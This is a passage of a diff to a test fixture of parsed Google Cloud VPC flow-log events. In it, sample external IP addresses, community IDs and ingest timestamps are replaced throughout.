"{\"insertId\":\"1gq7q7afe373f2\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":50364},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"9\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.412738626Z", "end": "2019-06-14T03:40:08.797851544Z", @@ -22382,9 +22382,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 50364, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -22398,7 +22398,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:peICi+mlxd/skeLBLZFlScKlq64=", + "community_id": "1:0TTLV6IDTX3Y7z7HtKV0pV2QKHY=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -22413,7 +22413,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -22437,8 +22437,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869229300Z", - "original": "{\"insertId\":\"1gq7q7afe373ee\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":50364,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"8\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392418300Z", + "original": 
"{\"insertId\":\"1gq7q7afe373ee\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":50364,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"8\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.412738626Z", "end": "2019-06-14T03:40:08.797851544Z", @@ -22465,17 +22465,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 33126, "bytes": 1457, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:sXU+vhS+/ljMyFECIDnNyFQq2qU=", + "community_id": "1:WVHhCd41Iy4u55Nq5yD2UbPpH/M=", "bytes": 1457, "transport": "tcp", "type": "ipv4", @@ -22489,7 +22489,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -22514,8 +22514,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869232300Z",
- "original": "{\"insertId\":\"1gq7q7afe373ey\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":33126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392422600Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373ey\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:44:50.809605761Z", "end": "2019-06-14T03:44:50.919744677Z", @@ -22544,17 +22544,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65318, "bytes": 73215, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 747 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:GgfFDV/IDDGuMmQ9Zk+/ReCe5Rk=", + "community_id": "1:abTkiqsELuUBAWswX/nZozHWPVo=", "bytes": 73215, "transport": "tcp", "type": "ipv4", @@ -22568,7 +22568,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -22593,8 +22593,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869235100Z",
- "original": "{\"insertId\":\"1gq7q7afe373e7\",\"jsonPayload\":{\"bytes_sent\":\"73215\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65318},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"96\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392426800Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373e7\",\"jsonPayload\":{\"bytes_sent\":\"73215\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65318},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"96\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760345858Z", "end": "2019-06-14T03:49:56.220599950Z", @@ -22615,9 +22615,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 53096, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -22631,7 +22631,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:46cExc+emRbBX/kM/ZWcv8rVUgE=", + "community_id": "1:PZTJxnZbum9ENBi23DLcdTxQuaQ=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -22646,7 +22646,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { 
@@ -22670,8 +22670,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869237800Z",
- "original": "{\"insertId\":\"1gq7q7afe373f8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392430200Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373f8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:43:20.700692281Z", "end": "2019-06-14T03:43:20.813699795Z", @@ -22698,18 +22698,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 176465, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 65 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:HQLAb7M1d/3INTFS0VfYPWDgNSc=", + "community_id": "1:fI3fEoMHmZ6GEw9+CNJ6V2s6dfw=", "bytes": 176465, "name": "default", "transport": "tcp", @@ -22731,7 +22731,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -22768,8 +22768,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869240500Z",
- "original": "{\"insertId\":\"1gq7q7afe373ec\",\"jsonPayload\":{\"bytes_sent\":\"176465\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"65\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392434600Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373ec\",\"jsonPayload\":{\"bytes_sent\":\"176465\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"65\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466779642Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -22790,9 +22790,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 33126, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -22806,7 +22806,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:sXU+vhS+/ljMyFECIDnNyFQq2qU=", + "community_id": "1:WVHhCd41Iy4u55Nq5yD2UbPpH/M=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -22821,7 +22821,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -22845,8 +22845,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869243100Z",
- "original": "{\"insertId\":\"1gq7q7afe373f5\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":33126,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392440100Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373f5\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33126,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:44:50.809605761Z", "end": "2019-06-14T03:44:50.919744677Z", @@ -22873,17 +22873,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 56478, "bytes": 1458, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:bLZCzhETfwqvL9yQ1jHjTJwKork=", + "community_id": "1:ZjB7c0mLOtmDfg7yu+dLPbrvJHQ=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -22897,7 +22897,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -22922,8 +22922,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869245800Z",
- "original": "{\"insertId\":\"1gq7q7afe373f6\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":56478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392445700Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373f6\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:20.450631492Z", "end": "2019-06-14T03:47:20.566586739Z", @@ -22944,10 +22944,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 52430, "domain": "zeek-nsm", - "ip": "198.51.100.88" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -22961,7 +22961,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ymi/D60yNYon9EIJPZfAYxcQ+xc=", + "community_id": "1:qGRQsZIORaZZvgSDCjliRbZbsD0=", "bytes": 32764, "name": "default", "transport": "tcp", @@ -22984,7 +22984,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.88" + "67.43.156.14" ] }, "gcp": { 
@@ -23020,8 +23020,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869248500Z",
- "original": "{\"insertId\":\"1gq7q7afe373fo\",\"jsonPayload\":{\"bytes_sent\":\"32764\",\"connection\":{\"dest_ip\":\"198.51.100.88\",\"dest_port\":52430,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"228\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392451200Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373fo\",\"jsonPayload\":{\"bytes_sent\":\"32764\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":52430,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"228\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:07.968717244Z", "end": "2019-06-14T03:49:53.081386115Z", @@ -23042,9 +23042,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34536, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -23058,7 +23058,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:+zMbnpjHTGFzARWUkJuGfy8ryQE=", + "community_id": "1:UvoHbtWzAMEin6FWcQYUnzv4vOQ=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -23073,7 +23073,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
